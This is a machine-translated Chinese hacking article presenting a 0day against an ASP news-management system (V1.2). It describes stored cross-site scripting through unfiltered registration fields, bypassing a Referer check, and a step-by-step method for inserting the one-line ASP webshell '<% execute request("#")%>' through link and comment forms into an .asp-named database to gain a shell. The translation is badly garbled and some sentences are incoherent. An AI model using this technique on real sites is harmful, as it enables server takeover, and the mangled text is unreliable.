Let the LOOP anti-download useless take a direct shell-vulnerability warning-the black bar safety net

ID MYHACK58:62201026199
Type myhack58
Reporter 佚名
Modified 2010-02-17T00:00:00


Title: let the LOOP anti-download useless take a direct shell-the analysis of boiling news multimedia Outlook system V1. 2 0Day Author: Mo if you are asked[B. H. S. T]& Lee, mi [L4nk0r] Source: L4nk0r'S Blog This article has been published in the hackers Handbook 2 0 0 9 in the 9th issue of the magazine, after the author posted on the blog, such as reproduced please retain this information

L4nk0r:to facilitate everyone to read, and finally provides a file package to download Things reasons: Summer vacation at home alone reading a book,browsing a website when the total feel of this website, the whole page is like a system. So it looked really boiling prospect news system. Remember to get up early this system to exist many loopholes. Not immediately to its official website to download the latest version V1. 2 Build1 version. This version relative to the previous version of the safety has improved a lot,but in reading the code in the process or discover some shortcomings to came and share,following the exploits of the form to do the following analysis,vulnerability itself is nothing,note ideas.

A. The registration page cross-site even plug horse Registered across the station even write the Trojan,vulnerability file adduser1. asp and saveuser. asp In adduser1. asp user registration through a simple javascript to determine the username of the form if it contains illegal characters(in savauser. asp in the same filter,so the username field can't use). Programmers too believe Javascript. Causing the user can input malicious code submitted to the database,The code is as follows(savauser. asp file,here omitted part of the irrelevant code)

sex=request. form("sex") // here there is no any filtering,can be through a local submission of expression of birthyear=request. form("birthyear") //Ibid. birthmonth=request. form("birthmonth") // Ibid. birthday=request. form("birthday") depid=ChkRequest(request. form("depid"),1) 'anti-injection,used here ChkRequest()to prevent injection,follow-up photo=request. form("photo")

Obviously the above these parameters, in addition to a depid filter the other is the direct access and directly behind the updates to the database. We know Javascirpt can local submit a bypass,so the cross-site there is no problem. But in the test it was found no,well carefully review the files it contains,I understand the programmer why so”confident”. See ChkURL. asp,code is as follows:

server_v1=Cstr(Request. ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request. ServerVariables("SERVER_NAME")) if mid(server_v1,8,len(server_v2))<>server_v2 then -------------------------------Behind a bunch of tips---------------------------------------

The use of REFERER prohibit local submission. Or old ideas,configured Referer. Here I through WinSock Expert capture and then NC to modify the data submitted. Here do not explain,of course this vulnerability with later use is also possible. II. Mortally wounded-<%loop<%useless take a direct shell 1. Cause analysis Directly open the database/data/news3000. asp database the default is asp format(believe that no webmaster will put it into the mdb). This is behind the use of the premise. We locally changed the mdb to open,found inside a table,as shown in Figure 1: ! [Highslide JS](http://www.l4nkor.org/read.php/attachment.php?fid=60) NotDownload the table,its contents are displayed as:”long binary data”,this is the table resulting in our Access database appears as shown in Figure 2 prompts: ! [Highslide JS](http://www.l4nkor.org/read.php/attachment.php?fid=61) The reason for the Loop is the asp in the loops,in fact in the database that the string long binary data is<%loop<%hexadecimal form 3C25206C6F6F70203C25. We can use UltraEdit in hex form to open it,then search for<%will be found as shown in Figure 3: ! [Highslide JS](http://www.l4nkor.org/read.php/attachment.php?fid=62) Know the asp syntax people see here should all understand why there would be Figure 2 prompt the. So when you insert the phrase when the script can not be closed problem. In addition<%loop<% this is not closed. The following is the key idea:since it cannot be closed,whether we can comment out? Thought of here,we'll think of single quotation marks,Yeah, that's it-the ASP comment character,but the premise is,to be able to before he inserted a<%’;x (i.e.,

<%&#3 9;x

Here x can be other characters,is for the later characters into the unicode encoding used.) In addition,also in the<%loop<%insert a%>x(here X is same)to make it and the front Insert of the closure. So that you can comment out the<%loop<%this impossible closure of the issue. We sort out ideas:is in


Before appropriate location for the insertion of a segment can be closed the code,and in this 2 The closed symbols in the middle of the content commented on. Ideas with..you can operate. Otherwise stated,when you use UltraEdit in hex form to open the database when search<%if not<%for loop in that,as evidenced here may be inserted before the position is closed identifier,Similarly,the rear closure identifier can also be determined. Clear thinking,we see examples of the operation. II. Examples of presentation-boiling prospect news system V1. 2 0day Open/data/news3000. asp database found,the ordinary user can add the data table has:


1. attach the table-the file upload mode 2. FT_User table --by registering(with the vulnerability 1 The registration of cross-site use) 3. Link table-link to application 4. News table --publishing news 5. Review the table --comment on the news 6. UploadPic table --upload images

By the exhaustive method,several tests found,Front Closure identifier can be in Use inserted into a table,then set the closed descriptor can be on the Review table in the Insert,the other tables are interested can self-test. By default,the system links and the reply(visitors can)is open. For a link to close the application only through the other tables,here is just an example,you can press the ideas draw inferences. ok,not nonsense, directly press the figure 4 to fill in(here is also the Javascript after the judgment is directly inserted into the database) ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=63) The site name”

┼Pay offs number 畣 whole 爠 Hwan enemy 瑳∨∣┩anger┼anvil

” Is through the lake2 written a2u4hack. exe tool to convert into Unicode encoding,it's prototype is:

<% execute request("#")%>a<%'x

,As shown in Figure 5: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=64) Here we should note that in the conversion process can not appear?, This is me just why a x reasons. And then directly submitted,regardless of whether the administrator review does not affect. Again UltraEdit hex form to open the search<%found as shown in Figure 6: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=65) The discovery of the first search is shown in Figure 6,that is has been successfully inserted into the pre-closure identifier. Now insert the just home the point of an article,click the below”comments”select visitor,and then the contents of that input as shown in Figure 7: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=66) Content: “┠ gravel “similarly also after a2u4hack. exe tool coding,its prototype is: %>x so after Submit you can submit to the database and the perfect Comments Off


All the work is done we see the following results. As shown in Figure 8: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=67) Successful insertion of the word Trojan,but also successfully links the direct get a WebShell. In addition. Of course, the program also has some shortcomings,interested friends can own mining. For this idea,when if you can not be so perfect insertion of the Trojans,whether we also thought by this method to filter out some of the upload suffix of the limitations of the data and then upload to get a webshell? Well,ideasSo,we flexible applications. The official demo site off a link,we don't do the test, after all just providing everyone an idea. This analysis ends here, for this vulnerability to harm larger,请 勿 做 非法 行为 . 有 任何 问题 可以 到 黑 手 论坛 与 我 讨论 或者 E-mail:awolf858@gmail.com.